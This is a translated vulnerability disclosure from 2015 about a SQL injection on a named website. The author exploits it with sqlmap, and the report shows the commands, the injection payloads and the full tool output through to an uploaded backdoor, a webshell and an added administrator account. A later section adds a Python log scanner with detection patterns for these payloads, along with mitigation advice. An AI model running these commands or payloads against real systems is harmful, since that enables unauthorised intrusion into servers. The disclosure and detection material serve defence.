2015-11-30: Details have been reported to the vendor and are awaiting the vendor's handling.
2015-12-05: The vendor has chosen to ignore the vulnerability; details are now disclosed to the public.
Last time, during a friendly test, I found multiple SQL injection vulnerabilities, all running with root privileges, and they were simply ignored. All I could do was shrug. So this time, let's talk about taking over the server!
We'll use one SQL injection as the example:
http://www.1218.com.cn/index.php/product?id=23
No more digressions, straight to the point!
First, check the privileges:
sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --password

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 04:26:22

[04:26:23] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file
[04:26:23] [INFO] resuming injection data from session file
[04:26:23] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[04:26:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=23' AND 4645=4645 AND 'SUds'='SUds

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF
---
[04:26:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[04:26:23] [INFO] fetching database users password hashes
[04:26:23] [INFO] fetching database users
[04:26:23] [INFO] fetching number of database users
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 4
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'localhost'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'127.0.0.1'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'::1'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': ''@'localhost'
[04:26:23] [INFO] fetching number of password hashes for user 'root'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 1
[04:26:23] [INFO] fetching password hashes for user 'root'
[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': *-----------------root privileges directly, the password is not needed----------------------
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash: -----------------root privileges directly, the password is not needed----------------------

[04:26:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'

[*] shutting down at: 04:26:26
Let's go with the simplest, most brute-force route: rather than hunting for an existing upload point, which would mean cracking a username and password (too much hassle), just create one directly.
sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --os-shell

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 04:35:14

[04:35:14] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file
[04:35:14] [INFO] resuming injection data from session file
[04:35:14] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[04:35:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=23' AND 4645=4645 AND 'SUds'='SUds

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF
---
[04:35:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[04:35:15] [INFO] going to use a web backdoor for command prompt
[04:35:15] [INFO] fingerprinting the back-end DBMS operating system
[04:35:16] [INFO] the back-end DBMS operating system is Windows
[04:35:16] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] PHP
[4] JSP
> 3
[04:35:19] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: E:/wamp/www
[04:35:23] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]:
[04:35:25] [INFO] the file stager has been successfully uploaded on 'E:/wamp/www' ('http://www.1218.com.cn:80/tmpudvwl.php')
[04:35:26] [INFO] the backdoor has probably been successfully uploaded on 'E:/wamp/www', go with your browser to 'http://www.1218.com.cn:80//tmpbcafg.php' and enjoy it!
[04:35:26] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
The upload point has appeared:
http://www.1218.com.cn/tmpudvwl.php
Then upload a webshell.
Next, escalate privileges and add a superuser account.
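From the defender's side, every step of this chain leaves a trail in the web server's access log: the boolean-based and time-based payloads shown in the sqlmap output, the sqlmap User-Agent, and the tmpXXXXX.php stager that --os-shell writes into the web root. The script below is an added example, not part of the original report, that flags those patterns over a few constructed Apache combined-log lines modelled on this report's requests; the client IPs, timestamps and response sizes are made up.

```python
import re
from urllib.parse import urlparse, unquote_plus

# Constructed Apache combined-log lines modelled on the requests in this report
# (the two sqlmap payloads and the tmpudvwl.php stager); not real server logs.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Nov/2015:04:26:23 +0800] "GET /index.php/product?id=23 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Nov/2015:04:26:24 +0800] "GET /index.php/product?id=23%27%20AND%204645%3D4645%20AND%20%27SUds%27%3D%27SUds HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
203.0.113.7 - - [30/Nov/2015:04:26:31 +0800] "GET /index.php/product?id=23%27%20AND%20SLEEP%285%29%20AND%20%27xrKF%27%3D%27xrKF HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
203.0.113.7 - - [30/Nov/2015:04:35:25 +0800] "POST /tmpudvwl.php HTTP/1.1" 200 312 "-" "sqlmap/0.9"
198.51.100.9 - - [30/Nov/2015:04:40:00 +0800] "GET /index.php/product?id=24 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Time-based blind: SLEEP()/BENCHMARK() inside a query parameter (sqlmap's "AND SLEEP(5)").
TIME_BASED = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
# Boolean-based blind: quote break followed by "AND n=m", true or false variant
# (sqlmap's "' AND 4645=4645" and its "' AND 4645=4646" counterpart).
BOOLEAN_BLIND = re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I)
# sqlmap's --os-shell stager lands in the web root as "tmp" + five letters + ".php".
STAGER_PATH = re.compile(r"^/tmp[a-z]{5}\.php$")


def classify_request(target, ua):
    """Return the detection tags that apply to one request target and User-Agent."""
    parsed = urlparse(target)
    query = unquote_plus(parsed.query)  # decode %27, %20, %28 ... before matching
    tags = []
    if TIME_BASED.search(query):
        tags.append("time-based-blind")
    if BOOLEAN_BLIND.search(query):
        tags.append("boolean-based-blind")
    if STAGER_PATH.match(parsed.path):
        tags.append("sqlmap-stager")
    if ua.lower().startswith("sqlmap"):
        tags.append("sqlmap-user-agent")
    return tags


def scan_log(text):
    """Return (client ip, request target, tags) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        tags = classify_request(m["target"], m["ua"])
        if tags:
            hits.append((m["ip"], m["target"], tags))
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(tags))
```

The stager write only succeeds because the application connects to MySQL as root: a least-privilege database account without the FILE privilege, together with a secure_file_priv setting that keeps MySQL from writing into the web root, blocks --os-shell even while the injection remains, and parameterised queries remove the injection itself.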
Done, the server is ours! That's it; I hope this gets your company's attention! PS: The webshell has been deleted and the upload point removed. The newly created administrator account is left behind as evidence; admins, please delete it yourselves!
(The vulnerability I submitted to your company last time was ignored, which was heartbreaking.) As I said before, you understand the importance of security better than I do; I'm just a novice!
Severity rating: No impact (vendor ignored)
Ignored at: 2015-12-05 11:14
Vulnerability Rank: 4 (WooYun rating)